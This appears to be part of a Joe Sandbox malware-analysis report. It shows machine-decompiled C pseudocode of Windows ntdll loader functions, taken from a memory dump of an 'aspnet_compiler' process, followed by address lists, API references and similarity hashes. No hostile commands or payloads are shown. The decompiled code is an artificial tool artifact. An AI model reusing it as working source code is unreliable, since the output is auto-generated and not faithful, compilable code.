				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x11cd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E010E6600(0x11c52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x11c7b9c; // 0x0
							_t281 = L010F4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0111F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x11c7b90; // 0x77d30000
								if(_t384 == 0) {
									_t353 =  *0x11c7b8c; // 0xe12b68
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0xe12c18
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E010F2280(_t200, 0x11c84d8);
									_t277 =  *0x11c85f4; // 0xe13058
									_t351 =  *0x11c85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x74640000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0xe130a0
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0xe12ff0
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0xe130a0
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0xe11218
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E010EFFB0(_t287, _t353, 0x11c84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0112CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E010E6600(0x11c52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E010E7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x11cb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0115E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x11c8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x11cb218; // 0x0
														asm("ror edi, cl");
														 *0x11cb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E010F2280(_t250, 0x11c84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01113898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E010EFFB0(_t293, _t353, 0x11c84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E011137F5(_t353, 0);
																}
																E01110413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01109B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E011002D6(_t174);
																}
																L010F77F0( *0x11c7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0110C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L010EEC7F(_t353);
										L011019B8(_t287, 0, _t353, 0);
										_t200 = E010DF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0111B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x11cb2f8; // 0x0
									if((_t206 |  *0x11cb2fc) == 0 || ( *0x11cb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x11cb2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E01186B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E01186AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E010EE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L010EEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E01119730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E010EE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L010E8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01113C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x010ed5f2
0x010ed5f5
0x010ed5f5
0x010ed5fd
0x010ed600
0x010ed60a
0x010ed60d
0x010ed617
0x010ed61d
0x010ed627
0x010ed62e
0x010ed911
0x010ed913
0x00000000
0x010ed919
0x010ed919
0x010ed919
0x010ed634
0x010ed634
0x010ed634
0x010ed634
0x010ed640
0x010ed8bf
0x00000000
0x010ed646
0x010ed646
0x010ed64d
0x010ed652
0x0113b2fc
0x0113b2fc
0x0113b302
0x0113b33b
0x0113b341
0x00000000
0x0113b304
0x0113b304
0x0113b319
0x0113b31e
0x0113b324
0x0113b326
0x0113b332
0x0113b347
0x0113b34c
0x0113b351
0x0113b35a
0x00000000
0x0113b328
0x0113b328
0x00000000
0x0113b328
0x0113b326
0x010ed658
0x010ed658
0x010ed65b
0x010ed665
0x00000000
0x010ed66b
0x010ed66b
0x010ed66b
0x010ed66b
0x010ed66d
0x010ed672
0x010ed67a
0x00000000
0x00000000
0x010ed680
0x010ed686
0x010ed8ce
0x010ed8d4
0x010ed8da
0x010ed8dd
0x010ed8dd
0x010ed8e0
0x010ed68c
0x010ed691
0x010ed69d
0x010ed6a2
0x010ed6a7
0x010ed6b0
0x010ed6b0
0x010ed6b5
0x010ed6e0
0x010ed6b7
0x010ed6b7
0x010ed6b9
0x010ed6b9
0x010ed6bb
0x010ed6bd
0x010ed6ce
0x010ed6d0
0x010ed6d2
0x0113b363
0x0113b365
0x00000000
0x0113b36b
0x00000000
0x0113b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x010ed6bf
0x010ed6bf
0x010ed6e5
0x010ed6e7
0x010ed6e9
0x010ed6e9
0x010ed6ec
0x010ed6ec
0x010ed6ef
0x010ed6f5
0x010ed6f9
0x010ed6fb
0x010ed6fd
0x010ed701
0x010ed703
0x010ed70a
0x010ed70a
0x010ed70a
0x010ed701
0x010ed70d
0x010ed710
0x010ed710
0x010ed6c1
0x010ed6c1
0x010ed6c1
0x010ed6c6
0x0113b36d
0x0113b36f
0x00000000
0x0113b375
0x0113b375
0x0113b375
0x00000000
0x0113b375
0x00000000
0x010ed6cc
0x010ed6d8
0x010ed6d8
0x010ed6d8
0x00000000
0x010ed6c6
0x010ed6bf
0x00000000
0x010ed6da
0x010ed6da
0x010ed716
0x010ed71b
0x010ed720
0x010ed726
0x010ed726
0x010ed72d
0x00000000
0x010ed733
0x010ed739
0x010ed742
0x010ed750
0x010ed758
0x010ed764
0x010ed776
0x010ed77a
0x010ed783
0x010ed928
0x010ed92c
0x010ed93d
0x010ed944
0x010ed94f
0x010ed954
0x010ed956
0x010ed95f
0x010ed961
0x010ed973
0x010ed973
0x010ed956
0x010ed944
0x010ed92c
0x010ed78b
0x0113b394
0x010ed791
0x010ed798
0x0113b3a3
0x0113b3bb
0x0113b3bb
0x010ed7a5
0x010ed866
0x010ed870
0x010ed884
0x010ed892
0x010ed898
0x010ed89e
0x010ed8a0
0x010ed8a6
0x010ed8ac
0x010ed8ae
0x010ed8b4
0x010ed8b4
0x010ed8ae
0x010ed7a5
0x010ed78b
0x010ed7b1
0x0113b3c5
0x0113b3c5
0x010ed7c3
0x010ed7ca
0x010ed7e5
0x010ed7eb
0x010ed8eb
0x010ed8ed
0x00000000
0x010ed8f3
0x010ed8f3
0x010ed8f3
0x00000000
0x010ed8ed
0x010ed7cc
0x010ed7cc
0x010ed7d2
0x00000000
0x010ed7d4
0x010ed7d4
0x010ed7d7
0x010ed7df
0x0113b3d4
0x0113b3d9
0x0113b3dc
0x0113b3dc
0x0113b3df
0x0113b3e2
0x0113b468
0x0113b46d
0x0113b46f
0x0113b46f
0x0113b475
0x010ed8f8
0x010ed8f9
0x010ed8fd
0x0113b3e8
0x0113b3e8
0x0113b3eb
0x0113b3ed
0x00000000
0x0113b3ef
0x0113b3ef
0x0113b3f1
0x0113b3f4
0x0113b3fe
0x0113b404
0x0113b409
0x0113b40e
0x0113b410
0x0113b410
0x0113b414
0x0113b414
0x0113b41b
0x0113b420
0x0113b423
0x0113b425
0x0113b427
0x0113b42a
0x0113b42d
0x0113b42d
0x0113b42a
0x0113b432
0x0113b436
0x0113b438
0x0113b43b
0x0113b43b
0x0113b449
0x0113b44e
0x0113b454
0x0113b458
0x0113b458
0x0113b45d
0x00000000
0x0113b45d
0x0113b3ed
0x00000000
0x00000000
0x00000000
0x010ed7df
0x010ed7d2
0x010ed7ca
0x0113b37c
0x0113b37e
0x0113b385
0x0113b38a
0x00000000
0x0113b38a
0x010ed742
0x010ed7f1
0x010ed7f8
0x0113b49b
0x0113b49b
0x010ed800
0x010ed837
0x010ed843
0x010ed845
0x010ed847
0x010ed84a
0x010ed84b
0x010ed84e
0x010ed857
0x010ed802
0x010ed802
0x010ed80d
0x00000000
0x010ed818
0x010ed818
0x010ed824
0x010ed831
0x0113b4a5
0x0113b4ab
0x0113b4b3
0x0113b4b8
0x0113b4bb
0x00000000
0x0113b4c1
0x0113b4c1
0x0113b4c8
0x00000000
0x0113b4ce
0x0113b4d4
0x0113b4e1
0x0113b4e3
0x0113b4e5
0x00000000
0x0113b4eb
0x0113b4f0
0x0113b4f2
0x010edac9
0x010edacc
0x010edacf
0x010edad1
0x010edd78
0x010edd78
0x010edcf2
0x00000000
0x010edad7
0x010edad9
0x010edadb
0x00000000
0x00000000
0x010edae1
0x010edae1
0x010edae4
0x010edae6
0x0113b4f9
0x0113b4f9
0x0113b500
0x010edaec
0x010edaec
0x010edaf5
0x010edaf8
0x010edafb
0x010edb03
0x010edb11
0x010edb16
0x010edb19
0x010edb1b
0x0113b52c
0x0113b531
0x0113b534
0x010edb21
0x010edb21
0x010edb24
0x010edcd9
0x010edce2
0x010edce5
0x010edd6a
0x010edd6d
0x00000000
0x010edd73
0x0113b51a
0x0113b51c
0x0113b51f
0x0113b524
0x00000000
0x0113b524
0x010edce7
0x010edce7
0x010edce7
0x00000000
0x010edce7
0x00000000
0x010edb2a
0x010edb2c
0x010edb31
0x010edb33
0x010edb36
0x010edb39
0x010edb3b
0x010edb66
0x010edb66
0x010edb3d
0x010edb3d
0x010edb3e
0x010edb46
0x010edb47
0x010edb49
0x010edb4c
0x010edb53
0x010edb55
0x010edb58
0x010edb5a
0x0113b50a
0x0113b50f
0x0113b512
0x010edb60
0x010edb60
0x010edb63
0x010edb63
0x00000000
0x010edb63
0x010edb5a
0x010edb3b
0x010edb24
0x010edb69
0x010edb69
0x010edb6c
0x010edb6f
0x010edb74
0x0113b557
0x0113b557
0x0113b55e
0x010edb7a
0x010edb7c
0x010edb7f
0x010edb82
0x010edb85
0x00000000
0x010edb8b
0x010edb8b
0x010edb8d
0x010edb9b
0x010edb9b
0x010edb9d
0x010edba0
0x010edba2
0x010edba4
0x010edba7
0x010edba9
0x010edbae
0x010edbae
0x010edbb1
0x010edbb4
0x010edbb4
0x010edbb7
0x010edbba
0x010edcd2
0x010edcd4
0x00000000
0x010edbc0
0x010edbc0
0x010edbd2
0x010edbd7
0x010edbda
0x010edbdd
0x010edbdf
0x00000000
0x010edbe5
0x010edbe5
0x010edbee
0x010edbf1
0x0113b541
0x0113b544
0x00000000
0x0113b546
0x0113b546
0x00000000
0x0113b546
0x010edbf7
0x010edbf7
0x010edbfd
0x010edbfd
0x010edbff
0x010edc0b
0x010edc15
0x010edc1b
0x010edc1d
0x010edc21
0x010edc21
0x010edc23
0x010edc23
0x010edc26
0x010edc29
0x010edc2b
0x00000000
0x00000000
0x010edc31
0x010edc34
0x010edc36
0x010edcbf
0x010edcbf
0x010edcc2
0x00000000
0x010edc3c
0x010edc41
0x010edc43
0x00000000
0x010edc45
0x010edc45
0x010edc47
0x00000000
0x010edc4d
0x010edc4d
0x010edc50
0x010edc52
0x010edc55
0x010edcfa
0x010edcfe
0x010edd08
0x010edd0a
0x010edd0c
0x00000000
0x010edd12
0x010edd15
0x010edd2d
0x010edd2f
0x010edd32
0x010edd35
0x00000000
0x010edd35
0x010edc5b
0x010edc5b
0x010edc5e
0x010edc61
0x010edc64
0x010edc67
0x010edc67
0x010edc6a
0x010edc6c
0x010edc8e
0x010edc8e
0x010edc91
0x010edc93
0x010edcce
0x010edcce
0x010edc95
0x010edc9c
0x010edc6e
0x010edc72
0x010edc75
0x010edc77
0x010edc79
0x0113b551
0x0113b551
0x00000000
0x010edc7f
0x010edc7f
0x010edc81
0x00000000
0x010edc83
0x010edc86
0x010edc88
0x00000000
0x00000000
0x00000000
0x00000000
0x010edc88
0x010edc81
0x010edc79
0x010edc6c
0x010edc55
0x010edc47
0x010edc43
0x00000000
0x010edc36
0x010edc23
0x00000000
0x010edbff
0x010edbf1
0x010edbdf
0x010edb8f
0x010edb92
0x010edb95
0x00000000
0x00000000
0x00000000
0x00000000
0x010edb95
0x010edb8d
0x010edb85
0x010edb74
0x010edc9f
0x010edca2
0x010edcb0
0x010edcb0
0x010edad1
0x0113b4e5
0x0113b4c8
0x00000000
0x00000000
0x00000000
0x010ed831
0x010ed80d
0x00000000
0x010ed800
0x0113b47f
0x0113b485
0x00000000
0x0113b485
0x010ed665
0x010ed652
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 010ED898

Strings

X0, xrefs: 010ED69D
h+, xrefs: 010ED8CE

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: DebugPrintTimes
String ID: X0$h+
API String ID: 3446177414-1552749228
Opcode ID: 08ed9fc312d13a04338a225bc12330f596eaa37c897590a43d01831efe70d3db
Instruction ID: 2858449f4b34790960529a80d516513514d07b64b8ca53d809e52aaa06b66d08
Opcode Fuzzy Hash: 08ed9fc312d13a04338a225bc12330f596eaa37c897590a43d01831efe70d3db
Instruction Fuzzy Hash: 29E1C230A04355CFEB398F5AC988BA9BBF2FF85304F0401E9D98997295E774A981CF51

Uniqueness

Uniqueness Score: -1.00%

Function 010E8794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E010E8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E010E934A() != 0) {
								_t159 = E0115A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x11c5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01155510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x11c5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E010E849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E010E8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
